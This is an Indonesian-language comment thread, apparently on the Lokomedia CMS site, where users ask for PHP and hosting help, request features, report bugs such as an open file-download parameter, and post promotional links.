    buat temen2 yng kesulitan cari hosting gratis, saya ada saran di phpnet.us daftar aja :D seperti web percobaan punya saya http://www.reddistro.phpnet.us/home

  • ehost | 03 Juli 2011 - 19:37:43 WIB

    Makasih pak Lukman, Website kami sudah berhasil lounching dengan baik dan SEO Friendly.
    Terima Kasih

    http://www.ehost.co.id
    best Regards

  • Nekor | 04 Juli 2011 - 11:51:16 WIB

    barusan nemu, website sosial bookmark yg baru aja launching...
    check out aja deh.. cukup lumayan dr segi sistemnya

  • Nekor | 04 Juli 2011 - 11:52:20 WIB

    Upss!!. lupa ma situsnya...
    nih...
    www.meambo.com

  • nm | 05 Juli 2011 - 17:44:25 WIB

    mas cms forum lokomedianya ada gak mas???

  • paijo | 05 Juli 2011 - 23:18:44 WIB

    gmn kok ndak bisa....?
    mas mau nanya cmsnya kok klao di upoad ke oowebhost.com kok ndak muncul alias error
    toOlong bantuan......

  • Usman Ependi | 07 Juli 2011 - 20:06:44 WIB

    mas gimana kalau di tambah share ke social network-nya di setiap posting / halaman

  • heloo | 08 Juli 2011 - 00:42:30 WIB

    gimana cara lihat path link halamna

  • Grosir Sepatu | 08 Juli 2011 - 23:46:56 WIB

    Ide bagus buat mas Usman, jadi artikel bisa langsung di share ke halaman social network tentunya :-)

  • muhib | 10 Juli 2011 - 16:10:39 WIB

    gmn cara untuk menampilkan foto2 dalam berita lebih dari satu foto? tanks penjelasannya

  • Jayen | 10 Juli 2011 - 16:22:48 WIB

    Halo teman2 semuanya, mohon infonya.
    Saya pake template elJquery yg pertama, nah saya coba input berita. Tp trus saya coba search dgn fasilitas search yg sdh disediakan disitu. Tp ko hasilnya: Tidak ditemukan kata tsb. Tp kalo saya search berita yg sudah ada langsung di template dari pak lukman, bisa. Saya coba berulang2 tp gak bisa. Saya coba juga template elJquery2 juga sama. Mohon infonya teman2 semuanya ya.

  • Xiema Nocturno | 11 Juli 2011 - 00:03:04 WIB

    Pak Lukman
    Saya Newbie, mohon bantuannya.
    Saya dah instal lokomedia 1.5 di localhost, udah install db sqlnya ..dah bisa masuk adminwebnya jga..giliran mo masuk localhost/lokomedia..ada tulisan database tidak bisa dibuka.. :( pdahal sudah saya ubah/ganti isi password di config/koneksi.php nya.
    Sbagai info tambahan Saya make appserv 2.5.9.
    Gimana nih pak ato teman2 mungkin bisa bantu saya.. Seblumnya terimakasih dan Maju terus Lokomedia!!

  • comex | 11 Juli 2011 - 13:12:01 WIB

    modivikasi template lokomedia menjadi template website iklan baris.. ala plugin tdo_form'nya wordpress
    http://iklanku.grahaweb.net
    Gratis klo yang pengen download..

  • gadis desa | 11 Juli 2011 - 13:39:14 WIB

    Mksh mas ats buku2nya. dan ini aq coba buat dg gaya q sndiri.

    pd berkunjung y. buat mas Lukman ToP bGt deeh...

  • Nuban | 12 Juli 2011 - 21:11:24 WIB

    Halo semuanya, ada yg bisa bantu gak? Saya pengen buat web kayak website ini:
    www.astinproduction.com Jadi saat pertama muncul seperti ada animasi flash seperti di web itu, trus saat di klik baru masuk ke website tsb. Gmana script phpnya, trus saya nempatin file tersebut dimana kira2? Saya pake template elJquery yg pertama. Mohon info kalo ada yg tau caranya.
    Thx

  • comex | 13 Juli 2011 - 20:40:21 WIB

    nuban : ya halaman index'nya dipasang full flash dg cara pemanggilan file flash <embed src=""dst.....></embed>, trus di kasih action script menuju link website utama...

  • Nuban | 14 Juli 2011 - 22:59:48 WIB

    #comex: Wah.... Thanx, udh nanggapin, tapi trus terang, gak ngah...He...he... sorry gak ngerti mksdnya.
    <embed src=""dst.....></embed> itu saya tempatin dimana? Di folder mana gitu? Ato di template elJquery-nya? Maaf... bener2 gak ngerti. Thanx

  • comex | 15 Juli 2011 - 03:29:53 WIB

    <object width="290" height="80"><param value="file_flash.swf" name="movie"/><param value="transparent" name="wmode"/><embed width="290" src="file_flash.swf" wmode="transparent" height="80" type="application/x-shockwave-flash"></embe d></object>

    height dan width'nya diatur sesuai kebutuhan, di taruh di file utama template/file yang menampilkan halaman depan web..

  • heru | 15 Juli 2011 - 03:32:31 WIB

    gan master php, gmn seh caranya bikin scrollable berjalan otomatis, kayak web http://www.plasamuslim.com/ atau link tutorialnya
    makasih

  • Jayen | 20 Juli 2011 - 14:21:48 WIB

    Teman2 semuanya, mau nanya nih.
    Kalo misalnya kita rubah folder admin dan tinymcpuk utk masalah security, apa ada file lain yg juga harus dirubah? atau memang cuma nama foldernya saja? Mohon info ya. Thanx utk semuanya..

  • BAYU | 22 Juli 2011 - 14:58:13 WIB

    @ jAYEN,..iya cuman itu aja setau aku,..hee,..

  • anto | 23 Juli 2011 - 04:28:01 WIB

    Mas Lukman, kapan update terbarunya nih?
    trus bagaimana tindak lanjut perbaikan BUG yg disampaikan eidelweiss via email..? thanks..

  • ufhy | 01 Agustus 2011 - 04:28:51 WIB

    Mas..
    tolong kasih contoh juga dengan penggunaan jquery pada form komentarnya..
    misalnya validasi mas

  • ully | 03 Agustus 2011 - 09:14:23 WIB

    mas siapa aja para MASTER2 baik hati semua....
    kenapa waktu tambah berita headline,gambar ga muncul di slidenya.pdhl waktu msh localhost bisa tp setelah onlen jd ga bisa........solusinya gimana?

    matur tengkyu...semoga kebaikannya dibales berlipat ganda

  • lokomedia fans | 06 Agustus 2011 - 23:47:44 WIB

    mas punya saya di "sekilas info" sering di inject datanya dan dimasukkan contoh: 123 dah saya hapus muncul lagi gimana cara penanganannya bravo buku loko media

  • comex | 08 Agustus 2011 - 16:21:37 WIB

    modivikasi template lokomedia menjadi template website iklan baris.. ala plugin tdo_form'nya wordpress
    http://iklanku.grahaweb.net

  • Perfect Mp3 | 12 Agustus 2011 - 04:30:54 WIB

    numpang review mas untuk free download mp3 music http://perfectmp3.org

  • ima | 26 Agustus 2011 - 12:02:36 WIB

    mas lukman, cms.x bagus ne... n saya tertarik ma fordisnya ne...
    bisa req nggak..
    tolong tambahin di fordis:
    1. avatarnya langsung aja nggak pake gravatar lagi
    2. PM user mas... n
    3. ada halaman user detailnya mas(profil n total postingnya)
    gitu aja mas masukan dari saya..
    mohon dtanggapi ya mas lukman...:)

    to be the best cms

  • Info Teknologi | 06 September 2011 - 13:09:38 WIB

    Mantap, Maju terus lokomedia, hasil karya anak bangsa
    http://www.internetberitaku.com/

  • asep | 12 September 2011 - 22:31:41 WIB

    mas mau tanya nih..
    knapa ya waktu d search d google yang muncul malah footernya...sedangkan konten nya ga semua???
    mohon pencerahan nya...

  • hendra | 14 September 2011 - 11:42:12 WIB

    mas lukman mo tanya dong sy baru belajar php, klo nambah ukuran file supaya lebih besar gmn ya...?

  • hendra | 14 September 2011 - 11:43:37 WIB

    dikirimin via email hnr_ema@yahoo.com

  • chandra | 15 September 2011 - 19:50:50 WIB

    gimana cara buat cms seperti <a href="http://copotin.com/" target="_blank">copotin.com</a>

    t hanks ya gan :)

  • chandra | 15 September 2011 - 19:51:48 WIB

    gimana cara buat cms seperti http://copotin.com/


    thanks ya gan :)


    maaf tadi salah ketik di atas :)

  • rian | 17 September 2011 - 10:18:39 WIB

    saya ada masalah pas masuk webnya ada error... tapi pas masuk admin bisa...

    mohon pencerahannya..

    terima kasih...

  • darma | 21 September 2011 - 02:41:33 WIB

    mohon pencerahanya master cms lokomedia. saya coba input berita setelah simpan kenapa ngeblank jadi layar putih semua ya.. ada yang pernah seperti ini tidak ya... mohon bantuanya master

  • Penulis Artikel | 02 Oktober 2011 - 05:21:52 WIB

    Wah... Mantab banget tampilannya mas... Izin donlot yah... Jaya selalu Lokomedianya mas...

  • awanxp | 02 Oktober 2011 - 20:44:42 WIB

    om lukman, pertamakali sya mu ngucapin terimakasih banyak atas semua ilmunya yg di share...

    jujur, karna bku n tutorial2 om lukman sya bsa mengerti apa itu php.. :)

    om lukman sya mu kasi usul di downlot.php..
    ketika proses download maka url menjadi downlot.php?file=PHP_weapon.jpg.. untuk file yg berkekstensi .php memang sudah ga bsa.. tpi coba downlot.php?file=apaja.selainphp.. mka tetap akan kedownload file yg berisi error log..

    solusi saya: sya tambahin variable get enkripsi md5 sebagai token (sperti phpmyadmin)

  • Andi | 06 Oktober 2011 - 10:32:55 WIB

    Mantab CMSnya mas.
    Mas Lukman dan mas Husada, bagaimana cara menambah menu utama sehingga tidak turun kebawah seperti websitenya mas Husada di www.kbiharofahmalang.com? Sebab kalau saya tambah kan Menu Utama, tambahnya turun kebawah. Terimakasih.

  • alquran | 06 Oktober 2011 - 11:15:45 WIB

    permisi numpang lewat, mohon di review website saya

    www.anekaquran.com

  • testing service indone | 06 Oktober 2011 - 13:05:36 WIB

    waw ini bagus banget saya pembaca setia bukulokomedia

  • affandy_rasyid | 08 Oktober 2011 - 11:48:38 WIB

    Mas lukman gimana munculkan shotboxnya. saya udah setting modul publish : Y, Aktif : Y. trus dicoba secara pffline dengan xamp shotboxnya ngak muncul

  • edi gunawan | 10 Oktober 2011 - 09:24:17 WIB

    Mas itu menu lavalamp kok ga jalan ya pas ane jalanin di localhost aslias hasil nyedot file.. padahal di cms.bukulokomedia.com bisa jalan... mohon pencerahannya,,

  • di santo | 14 Oktober 2011 - 10:14:14 WIB

    Tolong bantu saya:
    1.Mas Saya Coba Up datenya untuk TinyMCPUK waktu insert smile kok tidak muncul ya???
    2.Untuk membuat CMS/WEB semakin banyak file semakin bagus/semakin tidak??

  • di santo | 14 Oktober 2011 - 10:22:52 WIB

    Untuk point pertama maksut ane tidak muncul di tampilan halaman depannya.
    3.Saya pake template elJquery yg pertama, kemudian saya coba input berita. Saya coba search dengan fasilitas search yg sdh disediakan disitu. Tp hasilnya: Tidak ditemukan yang saya cari. Tp kl saya search berita yg sudah ada langsung di template dari pak lukman, bisa. Saya coba berulang tp gak bisa. Saya coba juga template elJquery2 juga sama.

  • ary | 24 Oktober 2011 - 11:10:00 WIB

    mas saya punya problem setelah hosting CMS lokomedia v 1.4.5
    kenapa ya pada saat input berita muncul error seperti ini.
    Forbidden

    You don't have permission to access /adminx/modul/mod_berita/aksi_berita.php on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

    Apache Server at domain.com Port 80

    mohon sulusinya mas...
    thanks sebelumnya

  • mikiwili | 24 Oktober 2011 - 18:49:24 WIB

    wah mantapz... ijin download gan

  • sam | 25 Oktober 2011 - 09:08:29 WIB

    tambahan dari saya adalah selain merubah folder admin juga dapat diberi proteksi melalui cpanel

  • sam | 25 Oktober 2011 - 10:16:10 WIB

    proteksi itu bisa diterapkan juga di tinymcpuk, hanya bermain dengan proteksi yang ada dicpanel

  • hehehe | 28 Oktober 2011 - 01:57:08 WIB

    agan-agan, perbaikin user login.. usernya kok dortap yah.. harus gantian.. klo log in 2 orang salah satu logout.. logout semua..

  • hehehe | 28 Oktober 2011 - 02:15:48 WIB

    wkwkkww.. ternyata w masih dalam 1 browser.. maaf ya.. xixi..

  • alquran | 28 Oktober 2011 - 17:18:18 WIB

    makanya dilihat dulu gannn browsernya....

    http://anekaquran.com

  • soni | 28 Oktober 2011 - 23:16:10 WIB

    pak lukman, saya ingin membuat url menjadi seperti di bawah ini bagaimana caranya?

    localhost/lokomedia/update-cms-lokomedia
    n
    jadi misalnya pada url detail berita tidak memakai : ../artikel-119-update-cmas-lokomedia.html

  • sam | 29 Oktober 2011 - 11:13:18 WIB

    masukan buat pak lukman, apa tidak lebih baik memakai editor Micro Tiny WYSIWYG editor dibanding dengan tiny mcpuk, soal untuk beberapa kasus cms-cms luar sekarang ini sudah memakai Micro Tiny WYSIWYG editor lebih simple dan untuk convert langsung dari ext doc lebih mudah

  • antique meuble | 29 Oktober 2011 - 20:55:49 WIB

    buat temen-temen lokomers tolong direview ya website saya....

    http://mebel-antik.com <== ini juga pake cms lokomedia

  • antique meuble | 29 Oktober 2011 - 20:56:43 WIB

    buat temen-temen lokomers tolong direview ya website saya....

    http://mebel-antik.com <== ini juga pake cms lokomedia

  • antique meuble | 29 Oktober 2011 - 20:58:04 WIB

    buat temen-temen lokomers tolong direview ya website saya....

    http://mebel-antik.com <== ini juga pake cms lokomedia

  • Purnomo | 30 Oktober 2011 - 10:11:56 WIB

    Mohon bantuannya teman lokomers semuanya.. Bagaimana cara buat sub menu memiliki sub menu lagi. Jd ada menu ke kanan pada sub menu. di CMS Lokomedia?
    Terima kasih sebelumnya.

  • sam | 01 November 2011 - 11:43:39 WIB

    untuk sub menu ke sub lagi, harus dioprek sendiri codingnya bro, jadi memang banyak kekurangannya kesana kemari, untuk segi design memakai jquery sdah sangat bangus, tinggal di optimasi aja scriptnya biar ga lemot loadingnya, tapi untuk securitynya harus benar2 dilihat

  • antique meuble | 02 November 2011 - 10:02:55 WIB

    buat temen-temen lokomers tolong direview ya website saya....

    http://mebel-antik.com
    http://mebel-antik.com
    http://mebel-antik.com <== ini juga pake cms lokomedia

  • evans | 05 November 2011 - 22:58:00 WIB

    Bagus juga tuh theme yang di <a href="http://www.gentarisoft.com/" target="_blank">gentarisoft.com</a>

  • evans | 05 November 2011 - 22:58:47 WIB

    Bagus juga tuh theme yang di http://www.gentarisoft.com

  • indra patmoko | 09 November 2011 - 09:40:52 WIB

    pada saat upload gambar dari FCK editor kok error ya...???
    Apa ada yang bisa membantu ???

  • Arif rachman | 11 November 2011 - 00:52:54 WIB

    Pak Lukman koq dikota saya gk ada beredar Buku Lokomedia
    Untuk Tembilahan Riau Bisa gk pesen secara online ?

  • wongedann | 13 November 2011 - 06:35:00 WIB

    mw pake cms indo aja susah bug dmna2 !

  • penggemar cms indo | 13 November 2011 - 13:31:54 WIB

    wongedan@emg bug nya dmna koq gw baik2 nie

  • Muhammad Anshari | 13 November 2011 - 14:04:58 WIB

    Mas Lukman, saya ada masalah tentang login admin yang sudah online, ketika saya login admin mengapa server tidak mau menyimpan session id webnya, namun ketika masih localhost loginnya masih bisa, saya sudah coba cek kesalahan2nya tidak ada masalah, padahal pada web2 yg pernah saya buat lainnya bisa login.
    Apakah aturan web hostingnya memang tidak boleh menyimpan session id atau tidak ya mas..???
    mohon penjelasannya ya mas...

  • mesin roti | 13 November 2011 - 18:55:35 WIB

    om lukman: sudah 8 bulan nih om gak ada update an lagi, kira2 kapan ada updetan???

    http://toko-muslim.web.id
    http://toko- muslim.web.id
    http://toko-muslim.web.id

  • tiwul instan | 17 November 2011 - 20:17:02 WIB

    mantapz nih gannn... ijin download ya

  • indo terbaru | 27 November 2011 - 06:22:45 WIB

    salam kenal....

  • tiwul instan | 27 November 2011 - 06:36:38 WIB

    wah dah PR 2 ya page ini

  • iklan poskota | 29 November 2011 - 21:34:43 WIB

    gan ada tutorial cara mengonlinekannya gak?
    masudnya upload ke hostingan.

  • Ridwan | 02 Desember 2011 - 19:26:41 WIB

    Assalamualaikum.. Mas,saya mau nanya nih, tlg dijawab! gmn ya caranya supaya pngunjung website lokomedia ini dapat mndaftar sndiri utk mnjadi member user? Saya butuh banget nih mas atas jawabannya, bwt diterapin disekolahan supaya para siswa dpt mnjadi member sehingga mereka bisa ngirimin tulisannya masing2x. utk jawabannya saya ucapkan banyak trimakasih!

  • syahrul | 06 Desember 2011 - 19:03:21 WIB

    Kalau nambah GuestBook gmn ya

  • jumjer | 08 Desember 2011 - 13:59:40 WIB

    test

  • Mazeltov | 09 Desember 2011 - 08:18:38 WIB

    edit berita gk bsa,tambah berita klo mau gk dijadikan headline radiobutton nya gk bsa...
    mohon bantuan

  • dedi eko cahyono | 12 Desember 2011 - 09:57:03 WIB

    mohon kasih tahu sih bang cara hosting web buku lokomedia

  • jumjer | 12 Desember 2011 - 12:48:24 WIB

    knapa ya..koq saya mau komen di sini
    hasilnya :
    You don't have permission to access /simpankomentar.php on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    Microsoft-IIS/6.0 Server at bukulokomedia.com Port 80

  • jumjer | 12 Desember 2011 - 12:53:22 WIB

    Mas2 para master PHP mohon bantuan_nya, import database cms lokomedia-1.1.4 dan cms lokomedia-1.1.5

    hasilnya :

    MySQL menyatakan:

    #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?

    `agenda` (

    `id_agenda` int(5) NOT NULL AUTO_' at line 1

    mohon bantuan_nya Mas2 para master PHP..

  • jumjer | 12 Desember 2011 - 14:30:53 WIB

    Mohon solusi nya Mas2 ku para master PHP..saya telah berusaha..tapi belum dapat solusi nya..

  • hot news | 17 Desember 2011 - 12:01:03 WIB

    bisa gak ya. belajar PHP tanpa guru??

  • arliva | 18 Desember 2011 - 21:14:38 WIB

    pengen belajar PHP

    http://widjiume.com/produk-69-arliva-normal.html
    http://widjiume.com/produk-69-arliva-normal.html
    ht tp://widjiume.com/produk-69-arliva-normal.html

  • arliva | 18 Desember 2011 - 21:16:36 WIB

    pengen belajar PHP

    . http://widjiume.com/produk-69-arliva-normal.html
    . http://widjiume.com/produk-69-arliva-normal.html
    . http://widjiume.com/produk-69-arliva-normal.html

  • arliva | 18 Desember 2011 - 21:17:24 WIB

    pengen belajar PHP


    . http://widjiume.com/produk-69-arliva-normal.html
    . http://widjiume.com/produk-69-arliva-normal.html
    . http://widjiume.com/produk-69-arliva-normal.html

  • jumjer | 19 Desember 2011 - 10:08:26 WIB

    Mas2 para master PHP mohon bantuan_nya, import database cms lokomedia-1.1.4 dan cms lokomedia-1.1.5

    hasilnya :

    MySQL menyatakan:

    #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?

    `agenda` (

    `id_agenda` int(5) NOT NULL AUTO_' at line 1

    mohon bantuan_nya Mas2 para master PHP..

  • jumjer | 19 Desember 2011 - 10:08:56 WIB

    Mohon solusi nya Mas2 ku para master PHP..saya telah berusaha..tapi belum dapat solusi nya..

  • sinhui | 20 Desember 2011 - 15:41:06 WIB

    super keren...

  • beritatoday | 20 Desember 2011 - 15:42:52 WIB

    keren banget pak

  • Medicine of Herbal | 20 Desember 2011 - 15:43:29 WIB

    thanks buad infonya

  • Nature-pills | 20 Desember 2011 - 15:44:12 WIB

    thanks berat

  • mainalyequal | 20 Desember 2011 - 15:46:21 WIB

    keren banget pak

  • Insurance | 20 Desember 2011 - 15:47:05 WIB

    thanks

  • Rizal Faizal | 20 Desember 2011 - 20:19:00 WIB

    berhati2lah dengan orang yg bernama: Andrea Adelheid
    Awas anda tertipu!!

  • ghokielzzz | 04 Januari 2012 - 01:36:54 WIB

    mantap masss lokomedianya, aku ijin sedot yaaaa buat belajar,.....
    jaya terus lokomedia
    hooorreeeeee,.......!!!!!!!!!

  • indra edy | 05 Januari 2012 - 02:12:52 WIB

    Mas lukmman or team lokomedia,..
    Saya ingin menggunakan cms 1.5 jequery untuk membangun unit produksi online di smk saya,..namun saya kesulitan untuk menambah modul dan menu - menu script codenya. saya udah beli buku untuk website super keren dangan PHP dan Jequry namun saya belum menukan titik temu jalan keluarnya,..intinya bagaimana saya dapat menggunakan cms jequery 1.5 dan menambahkan modul toko online,..mohon bantuannya jika kalau sempat mohon kirim ke email saya indraedy1@hotmail.com

  • aam bego | 09 Januari 2012 - 22:28:40 WIB

    saya terima kasih banyak om lukman, cz dri buku karya anda saya dapat mempelajari jquery...

    tapi saya mau kasih saran, saya masih mendapatkan bug waktu admin melakukan edit berita terkhusus berita yang judulnya mengandung koma atas('), maka setelah ' tersebut judul tidak ditampilkan secara lengkap, dan setelah saya tambah fungsi htmlentities(), akhirnya baru mw berjalan lancar...
    terima kasih.....

  • afon | 11 Januari 2012 - 22:14:51 WIB

    1. lebih keren klw di adminweb kita bisa mengurutkan berita, agenda, menu utama, dll..
    2. begitu di upload foto berita maunya langsung ditentukan ukuran file fotonya (...px x ..px) krna saya coba upload foto yang ukurannya besar tampilannya jadi jelek..
    padahal buku jauh sebelumnya udah ada dibahas mengurutkan berita, dll...
    3. apa beda .htaccess dan file lainnya di folder lokomedia dengan .htaccess dan file lainnya di lokomedia/config?

    terima kasih..
    sukses selalu buat lokomedia

  • prayit | 16 Januari 2012 - 19:20:44 WIB

    Pak lukman cms yang da di buku Membongkar Trik Rahasia Para Master PHP tidak bisa..
    setelah xamppnya saya update menjadi xampp-win32-1.7.7-VC9.
    Terjadi error berikut
    Notice: Use of undefined constant gambar - assumed 'gambar' in C:\Program Files\xampp\htdocs\lukman01\kanan.php on line 23

  • Nurul akhmad | 17 Januari 2012 - 20:09:05 WIB

    Terima kasih atas ilmunya. semoga semakin makmur untuk lokomedia. SUKSES SELALU

  • AW | 25 Januari 2012 - 21:59:59 WIB

    pak lukman tlg bhas ttg sms-gate way..

  • rino | 07 Februari 2012 - 19:59:22 WIB

    agan2 smw
    mw numpang tnya seh
    ko setiap upload gambar di berita error terus ya
    itu knp ya permasalahannya
    tp kalo upload di localhost ga da masalah
    tks..

  • Nurul mahdi | 08 Februari 2012 - 09:47:34 WIB

    Agan2 loko saya beli buku terbitan lokomedia. yang judulnya system informasi akademik. tapi saya tidak bisa cara input data baru !! mohon di bantu ya Ka, gan, pak !!!

  • indra | 12 Februari 2012 - 21:22:42 WIB

    pak lukman, skali2 open source donk tentang CMS perhotelan, klo e-commerce kan udh sering..hehehe

  • zhaploent | 18 Februari 2012 - 13:35:06 WIB

    suhu2 saya mo tanya dong, klo saya mo apus form komentar untuk keseluruhan bagaimana y?
    agak ribet edit source nya coz mash newbie....hehehe

    mo dijadiin web profil aja (baru niat)

    jayadi.vta@gmail.com

  • andre | 21 Februari 2012 - 07:36:52 WIB

    Dasyat mas bro : , lanjutkan. utak atik template dasbord dan admin nya :D mantap, kunjungi ya www.attaufiqalislami.sch.id

  • Purnama Hadi | 08 Maret 2012 - 13:22:08 WIB

    Saya termasuk yang cinta sama cms lokomedia dengan berbagai versinya, hanya saja untuk tokohp, gambarnya kok buram small_... bagaimana mengatasinya pak para master ...

  • astika | 20 Maret 2012 - 13:54:23 WIB

    pak saya pasang di ubuntu 11.10 server..di lognya saya cek muncul ini

    script '/var/www/media.php' not found or unable to stat


    kenapa ya media.phpnya thx

  • eko | 20 Maret 2012 - 14:06:00 WIB

    siang maz admin btw itu klo cms nya dipakai,,qo pas di search di google keluar iklannya lokomedia,, jadinya konten web aslinya g muncul,gmna cara ilanginnya y??mohon bantuannya agar cms lokomedia tetap digemari...

  • epur | 18 April 2012 - 16:04:30 WIB

    izin nyimak

  • heki agustiandra | 24 April 2012 - 00:04:27 WIB

    mas lukman ko di dalam final project yang di dalam buku "membongkar trik rahasia para master PHP "

    terjadi banyak kesalahan seperti ini
    tapi rata2 kesalahan ya muncul seperti ini

    Notice: Use of undefined constant tanggal - assumed 'tanggal' in D:\xampp\htdocs\lukman01\kanan.php on line 91

    saya menggunakan Xampp version 2.5

    terus bagaimana mas solusi ya ?
    terima kasih sebelumnya

    mohon dibalas

  • Highlights Bola Otomotif | 03 Desember 2012 - 21:53:32 WIB

    Mantap

  • ani | 03 September 2013 - 09:42:45 WIB

    terima kaih

  • fans | 03 September 2013 - 09:46:39 WIB

    baru tau

  • iqbal | 03 September 2013 - 09:47:22 WIB

    info menarik